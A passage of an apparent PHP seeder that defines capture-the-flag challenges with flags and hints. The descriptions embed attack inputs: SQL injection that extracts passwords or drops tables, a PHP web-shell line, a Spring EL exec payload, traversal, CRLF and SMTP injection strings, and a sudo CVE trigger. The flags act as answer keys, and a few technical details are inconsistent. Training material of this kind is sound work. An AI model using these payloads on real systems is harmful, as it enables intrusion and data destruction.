                'title' => 'Use-After-Free Exploit',
                'description' => 'Allocate, free, then use a buffer to write to freed memory.\nCorrupt function pointer: flag{uaf_exploited}',
                'flag' => 'flag{uaf_exploited}',
                'category' => 'binary',
                'difficulty' => 'Expert',
                'initial_points' => 500,
                'minimum_points' => 200,
                'decay' => 7,
                'is_active' => true,
                'hints' => 'Use-After-Free (UAF) is a memory corruption bug. Reuse freed memory',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Privilege Escalation - SUID Binary',
                'description' => 'A setuid binary runs as root. Exploit overflow or logic flaw.\nGain root shell: flag{privesc_suid}',
                'flag' => 'flag{privesc_suid}',
                'category' => 'binary',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'SUID binaries run with owner\'s privileges. Find the vulnerability',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'DNS Spoofing / Cache Poisoning',
                'description' => 'Craft DNS response before legitimate server.\nReplies resolve attacker.com to attacker IP.\nFlag: flag{dns_poisoned}',
                'flag' => 'flag{dns_poisoned}',
                'category' => 'network',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'DNS lacks authentication. Send spoofed responses with correct TID',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Network - Port Knocking Detector',
                'description' => 'Detect port knock sequence: 123, 456, 789\nAfter correct knock, service becomes accessible.\nFlag: flag{port_knock_open}',
                'flag' => 'flag{port_knock_open}',
                'category' => 'network',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Port knocking uses sequence of packets to "unlock" a service',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // ADDITIONAL CHALLENGES TO REACH 100+
            // ═══════════════════════════════════════════════════════════════════════

            [
                'title' => 'Cookie Manipulation',
                'description' => 'Modify session cookie in browser. Change admin=0 to admin=1\nGain access to admin panel: flag{cookie_hijacked}',
                'flag' => 'flag{cookie_hijacked}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Use browser DevTools (F12) to edit cookies. Look for session ID',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Response Header Leakage',
                'description' => 'Server leaks flag in HTTP response headers.\nHeader: X-Flag: flag{headers_leak_info}',
                'flag' => 'flag{headers_leak_info}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 50,
                'minimum_points' => 15,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Check all response headers. Look for custom X- headers',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Weak Password Policy',
                'description' => 'Change password to single character "a"\nServer accepts it due to weak validation: flag{weak_password}',
                'flag' => 'flag{weak_password}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Try very short passwords. Server might not validate minimum length',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Account Enumeration via Timing',
                'description' => 'Login response time varies. Valid accounts take longer due to bcrypt.\nExisting account "admin" detected: flag{timing_attack}',
                'flag' => 'flag{timing_attack}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Measure response time for valid vs invalid usernames',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Unicode Normalization Bypass',
                'description' => 'Bypass filter using homographs. Upload "ſhell.php" (ſ = long s)\nServer sees different character: flag{unicode_bypass}',
                'flag' => 'flag{unicode_bypass}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Unicode homoglyphs can bypass string matching',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Error-Based SQL Injection',
                'description' => 'Use database errors to extract data.\nPayload: \') AND extractvalue(1,concat(0x7e,(SELECT password FROM users LIMIT 1)))--\nFlag: flag{error_sql_injection}',
                'flag' => 'flag{error_sql_injection}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'MySQL extractvalue() returns errors containing extracted data',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Open Redirect Vulnerability',
                'description' => 'URL: /redirect.php?next=/admin\nIs validated, but /redirect.php?next=attacker.com works\nRedirect to attacker.com: flag{open_redirect}',
                'flag' => 'flag{open_redirect}',
                'category' => 'web',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Check if redirect target validation is weak or nonexistent',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'LDAP Injection with Bypass',
                'description' => 'LDAP query: (&(cn=*)(uid={input}))\nInput: *)(&\nBypass: flag{ldap_wildcard_bypass}',
                'flag' => 'flag{ldap_wildcard_bypass}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'LDAP wildcards (*) match any character sequence',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Path Traversal in Upload',
                'description' => 'Upload file with name: ../../../var/www/html/shell.php\nServer creates file outside upload dir: flag{path_traversal_upload}',
                'flag' => 'flag{path_traversal_upload}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Check if filename is properly sanitized before writing',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // ADDITIONAL CRYPTO CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            [
                'title' => 'Substitution Cipher - Simple',
                'description' => 'Decrypt: WLQQ GH IRUFHD (simple letter substitution)\nAllocation 26 letters shifted by 3: flag{substitution_cipher}',
                'flag' => 'flag{substitution_cipher}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Frequency analysis or brute force all 26! permutations',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SHA256 Hash Verification',
                'description' => 'Verify password by comparing hashes.\nGiven: sha256hash = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"\nThis is hash of empty string. Password: ""',
                'flag' => 'flag{}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 150,
                'minimum_points' => 45,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'SHA256 of empty string is e3b0c44... Try common passwords first',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Simple Substitution via Frequency',
                'description' => 'Ciphertext with space preserved. Frequency analysis:\nMost common letter = "e"\nUse letter frequency to break: flag{frequency_analysis}',
                'flag' => 'flag{frequency_analysis}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'English frequency: e, t, a, o, i, n... Compare with ciphertext',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'One-Time Pad (OTP) - Reuse Vulnerability',
                'description' => 'Two ciphertexts encrypted with same key.\nc1 = plaintext1 XOR key\nc2 = plaintext2 XOR key\nc1 XOR c2 = plaintext1 XOR plaintext2 (key cancels!)\nRecover both: flag{otp_reuse_vulnerability}',
                'flag' => 'flag{otp_reuse_vulnerability}',
                'category' => 'crypto',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'OTP key can only be used once. Reuse breaks security',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'ECB Mode Weakness - Pattern Recognition',
                'description' => 'Repeated plaintext blocks = repeated ciphertext blocks.\nIdentify repeated blocks in ECB mode ciphertext\nFinal key: flag{ecb_weakness}',
                'flag' => 'flag{ecb_weakness}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'ECB leaks information through ciphertext patterns',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // ADDITIONAL BINARY/PWN CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            [
                'title' => 'Simple Shellcode Injection',
                'description' => 'Inject shellcode that calls exit(). Shellcode bytes: \\x31\\xc0\\x40\\xcd\\x80\nExecuted: flag{shellcode_executed}',
                'flag' => 'flag{shellcode_executed}',
                'category' => 'binary',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'x86 assembly: xor eax,eax; inc eax; int 0x80 = exit(1)',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'ASLR Bypass - Partial Overwrite',
                'description' => 'When ASLR shifts addresses, overflow partial bytes.\nLeaked address + fixed offset reaches target: flag{aslr_bypass}',
                'flag' => 'flag{aslr_bypass}',
                'category' => 'binary',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'ASLR randomizes base address. Partial overwrites work if offset is fixed',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Integer Overflow',
                'description' => 'Array size check: if (size > 1000) reject\nBut size is uint8_t! Setting size=256 wraps to 0\nAllocation succeeds: flag{integer_overflow}',
                'flag' => 'flag{integer_overflow}',
                'category' => 'binary',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Integer overflow happens with unsigned types. Check bit widths',
                'created_at' => now(),
                'updated_at' => now(),
            ],

            // ═══════════════════════════════════════════════════════════════════════
            // ADDITIONAL FORENSICS/OSINT CHALLENGES
            // ═══════════════════════════════════════════════════════════════════════

            [
                'title' => 'ZIP File Analysis',
                'description' => 'Extract and analyze ZIP file. Contains text file with flag.\nUnzip archive and read: flag{zip_extraction}',
                'flag' => 'flag{zip_extraction}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Use unzip command or Python zipfile module',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Image Metadata - GPS Coordinates',
                'description' => 'Photo contains GPS EXIF data.\nCoordinates: 37.7749°N, 122.4194°W (San Francisco)\nFlag: flag{gps_coordinates}',
                'flag' => 'flag{gps_coordinates}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use exiftool or online tools to extract GPS from JPEG',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Wireshark HTTPS Traffic Analysis',
                'description' => 'Analyze PCAP with HTTPS traffic. Certificate contains hostname.\nSNI field: secure.company.com\nFlag: flag{https_sni}',
                'flag' => 'flag{https_sni}',
                'category' => 'forensics',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'SNI (Server Name Indication) is visible even in HTTPS',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Social Media Recon',
                'description' => 'Find target\'s Twitter, LinkedIn, GitHub profiles.\nUsername across platforms is the flag.\nFlag: flag{consistent_username}',
                'flag' => 'flag{consistent_username}',
                'category' => 'misc',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Search for consistent usernames across platforms',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Document Metadata Analysis',
                'description' => 'PDF contains author name in metadata.\nAuthor: John Smith\nFlag: flag{john_smith_author}',
                'flag' => 'flag{john_smith_author}',
                'category' => 'forensics',
                'difficulty' => 'Easy',
                'initial_points' => 100,
                'minimum_points' => 25,
                'decay' => 2,
                'is_active' => true,
                'hints' => 'Use pdfinfo or exiftool to extract metadata',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Deleted File Recovery from FAT',
                'description' => 'Recover deleted file from FAT filesystem.\nUNCHAIN sector clusters: flag{fat_recovery}',
                'flag' => 'flag{fat_recovery}',
                'category' => 'forensics',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Use testdisk, photorec, or analyze FAT manually',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Reverse Engineering a Game',
                'description' => 'Game executable contains hardcoded high score.\nDisassemble and find the value: 999999\nFlag: flag{game_highscore}',
                'flag' => 'flag{game_highscore}',
                'category' => 'reverse',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use IDA Free, Ghidra, or objdump to analyze executable',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Malware Sandbox Analysis',
                'description' => 'Malware creates file: C:\\Windows\\Temp\\flag.txt\nContains: flag{malware_analysis}\nDetect File I\\O calls.',
                'flag' => 'flag{malware_analysis}',
                'category' => 'forensics',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Use Cuckoo Sandbox, Any.run, or Winalyzer',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'URL Decoding Challenge',
                'description' => 'Decode: %66%6c%61%67%7b%75%72%6c%5f%65%6e%63%6f%64%65%64%7d',
                'flag' => 'flag{url_encoded}',
                'category' => 'crypto',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Each %XX is a hex-encoded ASCII character',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Reverse DNS Lookup',
                'description' => 'IP Address: 8.8.8.8\nReverse DNS: dns.google\nFlag: flag{dns_google}',
                'flag' => 'flag{dns_google}',
                'category' => 'network',
                'difficulty' => 'Easy',
                'initial_points' => 75,
                'minimum_points' => 20,
                'decay' => 1,
                'is_active' => true,
                'hints' => 'Use nslookup, dig, or host command',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Weak Random Number Generator',
                'description' => 'PRNG uses seed from system time.\nBrute force SEED from narrow time window.\nRecovered: flag{weak_prng}',
                'flag' => 'flag{weak_prng}',
                'category' => 'crypto',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Time-seeded PRNG is predictable. Try all times in window',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SQL Injection - Stacked Queries',
                'description' => 'Database allows stacked queries. Inject:\'; DROP TABLE users; --\nOr: \'; INSERT INTO users VALUES(...); --',
                'flag' => 'flag{stacked_queries}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Some databases (MSSQL, PostgreSQL) allow ; to separate commands',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'NoSQL Injection',
                'description' => 'MongoDB query: db.users.find({username: req.body.username})\nInject: {"$ne": null}\nQuery: {username: {$ne: null}} returns all users\nFlag: flag{nosql_injection}',
                'flag' => 'flag{nosql_injection}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'NoSQL injection uses query operators instead of SQL syntax',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Protocol Confusion Attack',
                'description' => 'Application handles both HTTP and HTTPS.\nHTTP response headers misinterpreted as HTTPS headers.\nFlag: flag{protocol_confusion}',
                'flag' => 'flag{protocol_confusion}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'Check how app distinguishes between HTTP and HTTPS',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Log Forging',
                'description' => 'Write to logs via application input.\nInject: admin login successful\nWhen admin checks logs, the forged entry appears\nFlag: flag{log_forging}',
                'flag' => 'flag{log_forging}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 200,
                'minimum_points' => 60,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Check if application logs user input without sanitization',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Path Confusion Attack',
                'description' => 'Check bypass with /admin/../../user.php\nServer interpretation differs from browser.\nGain access: flag{path_confusion}',
                'flag' => 'flag{path_confusion}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Different URL parsing can lead to inconsistent decisions',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Resource Exhaustion DoS',
                'description' => 'Send 10,000 requests per second.\nServer runs out of file descriptors or memory.\nCrash: flag{resource_exhaustion}',
                'flag' => 'flag{resource_exhaustion}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'DoS attacks consume resources, causing service unavailability',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Regex Denial of Service (ReDoS)',
                'description' => 'Regex pattern: (a+)+b matches slowly.\nPayload: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaac\nCPU exhaustion: flag{regex_dos}',
                'flag' => 'flag{regex_dos}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Nested quantifiers cause exponential backtracking',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Clickjacking / UI Redressing',
                'description' => 'Admin button overlaid with invisible iframe.\nAdmin unknowingly clicks malicious link.\nFlag: flag{clickjacking_attack}',
                'flag' => 'flag{clickjacking_attack}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Clickjacking uses iframes with opacity:0 to hide overlays',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'HTTP Response Splitting',
                'description' => 'Inject HTTP headers via \\r\\n:\nInput: redirect\\r\\nContent-Length: 0\\r\\n\\r\\nHTTP/1.1 200 OK\nSecond response: flag{http_response_splitting}',
                'flag' => 'flag{http_response_splitting}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'CRLF injection (%0d%0a) can split HTTP headers',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Polyglot File Upload',
                'description' => 'Create file that is both valid JPEG and valid PHP.\nGIF header: GIF89a at file start\nPHP code: <?php system($_GET["c"]); ?>\nFile bypasses upload restrictions: flag{polyglot_upload}',
                'flag' => 'flag{polyglot_upload}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Polyglot files are valid in multiple formats simultaneously',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Blind NoSQL Injection with Timing',
                'description' => 'Extract data via timing differences in MongoDB.\n$where: function() { if (password.indexOf("a") == 0) sleep(1000); }\nTiming leak: flag{nosql_timing}',
                'flag' => 'flag{nosql_timing}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'Time-based blind injection works on NoSQL too',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Cache Poisoning',
                'description' => 'Attacker sends request with malicious Host header.\nProxy caches response for future requests.\nAll subsequent users get poisoned content: flag{cache_poisoning}',
                'flag' => 'flag{cache_poisoning}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Cache headers like X-Forwarded-Host can be manipulated',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Prototype Pollution',
                'description' => 'JavaScript: Object.prototype.isAdmin = true;\nAll objects inherit isAdmin = true!\nFlag: flag{prototype_pollution}',
                'flag' => 'flag{prototype_pollution}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Polluting Object.prototype affects all instances',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Expression Language Injection',
                'description' => 'Spring EL: ${7*7} evaluates to 49\nExpression: ${T(java.lang.Runtime).getRuntime().exec(\'id\')}\nRCE: flag{el_injection}',
                'flag' => 'flag{el_injection}',
                'category' => 'web',
                'difficulty' => 'Hard',
                'initial_points' => 400,
                'minimum_points' => 150,
                'decay' => 5,
                'is_active' => true,
                'hints' => 'EL injection in Spring, JSF, or other Java frameworks',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Tar Path Traversal - Archive Extraction',
                'description' => 'TAR archive contains file: ../../etc/passwd\nExtract with tar xvf archive.tar\nWritten to /etc/passwd: flag{tar_traversal}',
                'flag' => 'flag{tar_traversal}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Check if extracting code validates archive member paths',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'SMTP Header Injection',
                'description' => 'Inject SMTP headers via email form:\nEmail: attacker@evil.com%0aBcc: victim@evil.com\nEmail sent to BCC too: flag{smtp_injection}',
                'flag' => 'flag{smtp_injection}',
                'category' => 'web',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Newlines (%0a, %0d) can inject SMTP commands',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'Local Privilege Escalation - Cron Job',
                'description' => 'Cron runs /tmp/backup.sh as root.\n/tmp/backup.sh is world-writable!\nEdit with malicious code: flag{cron_privesc}',
                'flag' => 'flag{cron_privesc}',
                'category' => 'binary',
                'difficulty' => 'Medium',
                'initial_points' => 250,
                'minimum_points' => 75,
                'decay' => 3,
                'is_active' => true,
                'hints' => 'Check cron jobs and file permissions carefully',
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'title' => 'CVE-2021-3156 (Sudo Buffer Overflow)',
                'description' => 'Older Linux sudo versions have buffer overflow.\nTrigger with: sudoedit -s /\nPrivilege escalation: flag{cve_2021_3156}',
                'flag' => 'flag{cve_2021_3156}',
                'category' => 'binary',
                'difficulty' => 'Hard',
                'initial_points' => 350,
                'minimum_points' => 120,
                'decay' => 4,
                'is_active' => true,
                'hints' => 'Update to latest sudo versions to patch this flaw',
                'created_at' => now(),
                'updated_at' => now(),
            ],
        ];
    }
}

